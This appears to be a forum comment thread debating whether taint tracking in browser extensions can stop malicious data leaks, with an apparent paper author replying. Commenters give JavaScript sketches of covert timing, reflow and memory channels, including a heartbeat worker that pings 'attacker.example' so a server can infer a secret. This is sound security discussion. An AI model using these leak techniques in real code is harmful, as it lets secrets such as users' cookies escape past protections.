Even without shared workers, the timing attack works: an untainted worker can connect to the attacker's site every second to update a value, and be killed by untainted code once the tainted worker has finished.
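(A rough sketch of that variant; the endpoint and runTaintedWork are made up, and it assumes the heartbeat worker itself never touches tainted data, so its requests stay untainted:)

// ping.js -- the untainted heartbeat worker
setInterval(function () {
  fetch("https://attacker.example/ping");   // one beacon per second
}, 1000);

// main script
var heartbeat = new Worker("ping.js");      // start the untainted clock
runTaintedWork();                           // tainted part lasts ~secret seconds
heartbeat.terminate();                      // beacons stop; the server reads the
                                            // secret off the last ping's timestamp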
EDIT: or you can do this with no multithreading at all: just call getMilliseconds() before and after the tainted code, and make the tainted part last secret_number milliseconds.
Or, if you blacklist getMilliseconds() as tainting, do the measurement on the server instead:
callAttackersServer();                      // first ping: server records t0
var tainted_int = getFromOtherServer();     // the secret value (tainted)
for (var i = 0; i < tainted_int; i++) {
    busyWait(100);                          // stall ~100 ms per unit of the secret
}
callAttackersServer();                      // second ping: server records t1

function busyWait(ms) {                     // spin loop: JS has no blocking sleep()
    var end = Date.now() + ms;
    while (Date.now() < end) {}
}
The difference in arrival time between the two calls is then interpreted on the server as the secret number.
You do that, and basically you end up treating everything as tainted.
Also: yes, you are missing something, namely that you don't need concurrency for this sort of timing attack. Even something as simple as "X does work or doesn't" plus "Y measures execution time" leaks timing info.
For another example: X either reflows the page or doesn't. Y keeps track of the page's refresh rate, or runs a timing attack to determine whether the page was reflowed, or injects JS into the page that pings website Z when a reflow happens. (Note that it can inject this JS before it grabs the sensitive data.)
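(Y's probe might look something like this; a sketch, assuming that reading offsetHeight forces a synchronous layout pass, which current engines do:)

var t0 = performance.now();
var h = document.body.offsetHeight;   // forces a synchronous layout pass
var dt = performance.now() - t0;
var xReflowed = dt > 1;               // a slow probe means X left layout dirty
                                      // (the 1 ms threshold is made up)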
For another example: depending on sensitive data, I either allocate a large array or I don't, and then detect how much memory is allocated before a GC happens.
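(A sketch of that allocation channel; performance.memory is a non-standard, Chrome-only API, and secretBit and THRESHOLD are stand-ins:)

// X's side: encode one secret bit in heap usage
if (secretBit) {
  var bigArray = new Array(50 * 1000 * 1000);  // large allocation stays live
}

// Y's side: read the bit back before a GC reclaims it
var used = performance.memory.usedJSHeapSize;  // Chrome-only, non-standard
var leakedBit = used > THRESHOLD;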
Note that this can be part JS / part "trusted" extension. It can even take advantage of parts of existing pages.
The more I consider this scheme, the more I think it's an elegant scheme against accidental leaks, but is fundamentally flawed against malicious leaks. Unfortunately, since the entire point of it is to protect against malicious leaks...
I'm not sure I follow your examples - you seem to ignore that anything happening inside a conditional that depends on a tainted variable becomes tainted itself.
So if you read my cookies and then access the DOM (to trigger a reflow or inject JS), then all future accesses to the DOM will be considered tainted.
This doesn't taint "everything", but it should taint exactly what we want to be tainted (all possible paths to our sensitive data).
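For instance, sketching the propagation rule described above (hypothetical taint semantics, not the paper's exact spec):

var cookie = document.cookie;          // tainted source
if (cookie.indexOf("session") >= 0) {  // branch depends on tainted data
  document.title = "x";                // DOM write inside a tainted branch
}
// from here on, DOM reads are considered tainted, so the reflow and
// JS-injection tricks above can only ever produce tainted values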
Yes, the challenge would be to find and treat all covert channels (time, GC, PRNG, etc.), but that seems surmountable. The very exotic channels (like your GC example) are best handled by trimming down the general API for trusted extensions.
I.e., most extensions don't need any kind of GC access to begin with. If your extension does, then all bets for fine-grained taint checks are off and it must be marked as "fully trusted" by the user before proceeding.
"Unfortunately, since the entire point of it is to protect against malicious leaks..."
That's actually not the entire point. At least in this paper, we do not claim to address attacks that leverage covert channels. But the attacker-model assumption is weaker (i.e., the attacker is assumed to be more powerful) than that originally assumed by the Chrome design (e.g., that only pages are malicious and will try to exploit extensions). And this is important, particularly because the design that we end up with will be more secure than the current one. So, at worst, the new system addresses the limitations of the existing system under their attacker model. Then, depending on how far you are willing to hack up the browser, underlying OS, or hardware, you can also try to address the covert-channel leaks.
Timing attack against yourself.
Something along the lines of the following, for instance:
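(A sketch, with getSensitiveData, sleepFor, and report as stand-in helpers:)

var secret = getSensitiveData();       // tainted
var LEN = secret.length;               // per the second note below, LEN can be
                                       // leaked up front so the loop bound
                                       // needn't taint the loop body
for (var i = 0; i < LEN; i++) {
  var t0 = Date.now();
  sleepFor(secret.charCodeAt(i));      // stall proportional to the i-th byte
  var dt = Date.now() - t0;            // timing yourself: dt encodes the byte
  report(i, dt);                       // with no direct data flow from secret
}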
(Note that it doesn't need to explicitly call sleep. It can do pretty much anything that takes a ~constant amount of time.) (Note that you can also leak LEN at the start, so as to avoid tainting the loop.)